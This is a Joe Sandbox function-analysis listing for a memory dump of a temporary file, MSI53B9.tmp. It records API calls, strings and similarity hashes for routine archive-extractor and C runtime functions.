Opcode ID: 44de562e4e4aadcf9dd3f48387150d1572a2cf8f2cea583dcb1f8f3e8f3c020f
Instruction ID: 08c260449b32b0b42735a750d2898955bbefd3f7b350bc5702553bd2fd4a37c9
Opcode Fuzzy Hash: 44de562e4e4aadcf9dd3f48387150d1572a2cf8f2cea583dcb1f8f3e8f3c020f
Instruction Fuzzy Hash: 61F03C32605604ABAE65FB9CF982D1A77E9FA0172075C4809F098D7D11C724FC80C651

Function 0089553F Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0089555D

Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA

_free.LIBCMT ref: 0089556F
_free.LIBCMT ref: 00895582
_free.LIBCMT ref: 00895593
_free.LIBCMT ref: 008955A4

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d384e2f2384d470300674ac38f946affe87a414be42a97e7ef7b6501971e5ca
Instruction ID: 45f85c300944d7ff5bf1b2a0c1e1cec7f3ce091ab0e1731bf96d1d9d2cf0b890
Opcode Fuzzy Hash: 7d384e2f2384d470300674ac38f946affe87a414be42a97e7ef7b6501971e5ca
Instruction Fuzzy Hash: 60F01DB4522A548F9F067F28FC029083BB4F70572034A011AF44492B65CB394801DB83

Function 00894BDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\MSI53B9.tmp,00000104), ref: 00894C1A
_free.LIBCMT ref: 00894CE5
_free.LIBCMT ref: 00894CEF

Strings

C:\Users\user\AppData\Local\Temp\MSI53B9.tmp, xrefs: 00894C11, 00894C18, 00894C47, 00894C7F

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp
API String ID: 2506810119-3310862248
Opcode ID: ce97ff094a4e4850305bf3ce601fd27a0b672513174c77837be3407c014f9d40
Instruction ID: 1316bae2919dd1a8ed6822006ce744df70d67ceca131a62fb7436de56269a1be
Opcode Fuzzy Hash: ce97ff094a4e4850305bf3ce601fd27a0b672513174c77837be3407c014f9d40
Instruction Fuzzy Hash: 5D316B71A01658AFDF21EBA99C81D9EBBFCFB85318F184066F805D7211D7718A41CB91

Function 00877463 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00877468

Part of subcall function 00873AA3: __EH_prolog.LIBCMT ref: 00873AA8

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0087752E

Part of subcall function 00877A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAC
Part of subcall function 00877A9D: GetLastError.KERNEL32 ref: 00877AF2
Part of subcall function 00877A9D: CloseHandle.KERNEL32(?), ref: 00877B01

Strings

SeRestorePrivilege, xrefs: 008774C1
SeSecurityPrivilege, xrefs: 008774AC

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: de3bd48214856f01cc69d8d0c28624fe04fecb12a54b108eae5302fa519a0eec
Instruction ID: c886b5b5edfd5635dfe4a7756ce7918239ce6928a9eea0b1fa6c85c2fa6eefde
Opcode Fuzzy Hash: de3bd48214856f01cc69d8d0c28624fe04fecb12a54b108eae5302fa519a0eec
Instruction Fuzzy Hash: 8831C171904208AAEF10EF68DC06BEEBB68FF46714F048025F94DE7696D7748A44CB62

Function 0088A8D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

CharUpperW.USER32(?,?,?,?,00001000), ref: 0088A92C
CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0088A953

Strings

-, xrefs: 0088A91A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CharUpper
String ID: -
API String ID: 9403516-2547889144
Opcode ID: 04f640e303532f4daceca3f90228278acbd4ab5cc46995da177394f98b557bb5
Instruction ID: 63da17b40bd6cd73844a5a5dd45e54b571e971a0fdc19cac743faa1d84e3727f
Opcode Fuzzy Hash: 04f640e303532f4daceca3f90228278acbd4ab5cc46995da177394f98b557bb5
Instruction Fuzzy Hash: D721A26240C20959E229BA6C8C09B7BBE98F745324F02441BF5A8D29C7E674D898D363

Function 00889123 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341

EndDialog.USER32(?,00000001), ref: 008891AB
GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 008891C0
SetDlgItemTextW.USER32(?,00000065,?), ref: 008891D5

Strings

ASKNEXTVOL, xrefs: 0088913B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 075f03abc915fa5c29127e901bf4eed15ecb57ff007231de2b218733bb9798c4
Instruction ID: fa7d84ef8c74377f02ed25fe0533d432004a7577ab69cd0b5b0a2bb6ef095848
Opcode Fuzzy Hash: 075f03abc915fa5c29127e901bf4eed15ecb57ff007231de2b218733bb9798c4
Instruction Fuzzy Hash: BC110636248206BFE605AFA8DD4EF763BADFB4A705F044010F241D74A5C33A9C05D722

Function 00889646 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341

EndDialog.USER32(?,00000001), ref: 00889694
GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 008896AC
SetDlgItemTextW.USER32(?,00000066,?), ref: 008896DA

Strings

GETPASSWORD1, xrefs: 0088965F

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: ec62be4988d6996649e20103727f7dfc07adc14a0951e9c7d63b1242be5e27b4
Instruction ID: f21aa53f13c1cafb1ba8664b42502a1db2d6fee341fa42ad7da976551ff8f655
Opcode Fuzzy Hash: ec62be4988d6996649e20103727f7dfc07adc14a0951e9c7d63b1242be5e27b4
Instruction Fuzzy Hash: 9611E53250011876EF21EE689D49FFA376CFB1A740F140010FA89F2980D2A5AD04D7A1

Function 0087B100 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0087B127

Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E

_wcschr.LIBVCRUNTIME ref: 0087B145
_wcschr.LIBVCRUNTIME ref: 0087B155

Strings

%c:\, xrefs: 0087B11D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: e625230acce6b34e7feb84121c51df995bf3cd145d1ea2acbf6c17d15eae1770
Instruction ID: 9b652876114d156d412e0e98140a0b23400fb82973b7cc2b6e4efcaf1d16b67c
Opcode Fuzzy Hash: e625230acce6b34e7feb84121c51df995bf3cd145d1ea2acbf6c17d15eae1770
Instruction Fuzzy Hash: 9E0192575043117ADA20AB699C86E6BB7ADFE963B0B94841BF84CC7085FB20D850C6B2

Function 0087F930 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(000001A0,008B1E74,00000000,?,?,0087FB88,00000020,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?), ref: 0087F969
CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F973
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0087A7C2,?,0087C74B,?,00000000,?,00000001,?,?,?,00883AFF), ref: 0087F983

Strings

Thread pool initialization failed., xrefs: 0087F99B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: b66eec3cab3690f0c35c35ede749aca9a7617b9365985cc80830f2701e84652f
Instruction ID: bcbe2bacc31a76ddc3a0bd9002851fcd2c4b446e87d545d07a04e5ce430c4bab
Opcode Fuzzy Hash: b66eec3cab3690f0c35c35ede749aca9a7617b9365985cc80830f2701e84652f
Instruction Fuzzy Hash: DC111FB1500705AFD3305F669885BA7FBECFB56355F10482EE3DEC2241DA7168408B50

Function 0088BEE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0088BF2C, 0088BF5E
RENAMEDLG, xrefs: 0088BF42

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 04bb5c5f2a63c7200a85aea85b97b4c6fe003a236978d65bc599e69fc92ea472
Instruction ID: 5e4adede1720c3c4a6c1477ea31ff1682fbe57ca6dbe4fd6e1c67016173ecb2e
Opcode Fuzzy Hash: 04bb5c5f2a63c7200a85aea85b97b4c6fe003a236978d65bc599e69fc92ea472
Instruction Fuzzy Hash: 58018472609216AFD701EF68EC44E26BBE9F78A398F000536F651D2630D7329C05EF61

Function 0087CE48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0087CE57
FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0087CE66

Strings

RTL, xrefs: 0087CE5F, 0087CE64, 0087CE98
LTR, xrefs: 0087CE76, 0087CE81, 0087CE8A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: LTR$RTL
API String ID: 3537982541-719208805
Opcode ID: 6405c7e819a064482c2ba04f404366183f30a3a643f8be1609789f7070703e9a
Instruction ID: d8f9382755c9a4f575d5211e554e464c2df447ce3430c61da2e9ec38d571f760
Opcode Fuzzy Hash: 6405c7e819a064482c2ba04f404366183f30a3a643f8be1609789f7070703e9a
Instruction Fuzzy Hash: 9EF0F62160471867E72466A59C0AF6B3BACF786700F04825DB605C71C0DAA1D90C8BA5

Function 00896552 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008965DD
__alldvrm.LIBCMT ref: 008967DE
__alldvrm.LIBCMT ref: 00896800

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
Instruction ID: b9601f001904493a699bec70159f1a00a02ab942eb20e3e247edd75c51d4f097
Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
Instruction Fuzzy Hash: 7FA15871900386AFDF22AF58C891BAEBBE5FF25314F1C42BDE485DB281E2389951C751

Function 00879F2A Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00877F55,?,?,?), ref: 00879FD0
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00877F55,?,?), ref: 0087A014
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00877F55,?,?,?,?,?,?,?,?), ref: 0087A095
CloseHandle.KERNEL32(?,?,00000000,?,00877F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0087A09C

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: f3aa83bc94cffebe5c04da57cf2d1f6d1ad18b0c4f10feaa0f6af74892fc8f5e
Instruction ID: 97a1fdfc9b897212311f1ba7128c06f75a6961c757c9fe32e1ac0f313c79aed4
Opcode Fuzzy Hash: f3aa83bc94cffebe5c04da57cf2d1f6d1ad18b0c4f10feaa0f6af74892fc8f5e
Instruction Fuzzy Hash: DF41CE31248380AAE735DE28CC45FAEBBE8FB85700F04891DF5E8D31C5DA64DA088B53

Function 008993F3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00892794,00000000,00000000,00892FC2,?,00892FC2,?,00000001,00892794,F5E85006,00000001,00892FC2,00892FC2), ref: 00899440
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008994C9
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008994DB
__freea.LIBCMT ref: 008994E4

Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: bf82a9e69750cc341def7b550bb0913d4ec48330148cd734a1809f3ae1b32173
Instruction ID: 0b3333260ec6e83dde3f40c0af64056b483fba4e9301a0262f5e67545a1aa0de
Opcode Fuzzy Hash: bf82a9e69750cc341def7b550bb0913d4ec48330148cd734a1809f3ae1b32173
Instruction Fuzzy Hash: 13318E72A0020AABDF26AF68DC45EAE7BA5FB40720F19412CFC45D6190E735CD91CBA4

Function 00889A76 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00889A86
GetObjectW.GDI32(00000000,00000018,?), ref: 00889AA7
DeleteObject.GDI32(00000000), ref: 00889ACF
DeleteObject.GDI32(00000000), ref: 00889AEE

Part of subcall function 00888BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00889AC8,00000066), ref: 00888BE1
Part of subcall function 00888BD0: SizeofResource.KERNEL32(00000000,751E5780,?,?,00889AC8,00000066), ref: 00888BF9
Part of subcall function 00888BD0: LoadResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C0C
Part of subcall function 00888BD0: LockResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C17

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID:
API String ID: 142272564-0
Opcode ID: 780cf05b1b16a3673795748f32ff454116a84a92023f7db02cf0fd2a69b6ee1f
Instruction ID: 7257a64beb11f06fb398efd4635870318de6adca9960ac846d0ac988b9314976
Opcode Fuzzy Hash: 780cf05b1b16a3673795748f32ff454116a84a92023f7db02cf0fd2a69b6ee1f
Instruction Fuzzy Hash: 2B01F73264022577D61177789D42EBFB6AEFF85B61F480011F940E7592DE618C0187A2

Function 00891009 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00891020

Part of subcall function 00891658: ___AdjustPointer.LIBCMT ref: 008916A2

_UnwindNestedFrames.LIBCMT ref: 00891037
___FrameUnwindToState.LIBVCRUNTIME ref: 00891049
CallCatchBlock.LIBVCRUNTIME ref: 0089106D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
Instruction ID: ec318953cf30b414ba96092af1354e7c019eb0b72bd5331a3d0c97386dbe84e6
Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
Instruction Fuzzy Hash: C8014C32400549FFCF226F59CC45EDA3BBAFF58754F094015FA18A5120C332E8A1EBA1

Function 00890B66 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00890B66
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00890B6B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00890B70

Part of subcall function 00891C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00891C1F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00890B85

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
Instruction ID: 9d3b0379393c440cfe76274445b925ce0758b6c5e63c2a6940cc462d540d98e4
Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
Instruction Fuzzy Hash: 12C04C6814C2465C1C203ABC664A1AD0380FE62BEDB8C51C5FC96D74139E06440A6837

Function 00888CF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00888BA5: GetDC.USER32(00000000), ref: 00888BA9
Part of subcall function 00888BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00888BB4
Part of subcall function 00888BA5: ReleaseDC.USER32(00000000,00000000), ref: 00888BBF

GetObjectW.GDI32(?,00000018,?), ref: 00888D24

Part of subcall function 00888EEA: GetDC.USER32(00000000), ref: 00888EF3
Part of subcall function 00888EEA: GetObjectW.GDI32(?,00000018,?), ref: 00888F22
Part of subcall function 00888EEA: ReleaseDC.USER32(00000000,?), ref: 00888FB6

Strings

(, xrefs: 00888DEF

Memory Dump Source

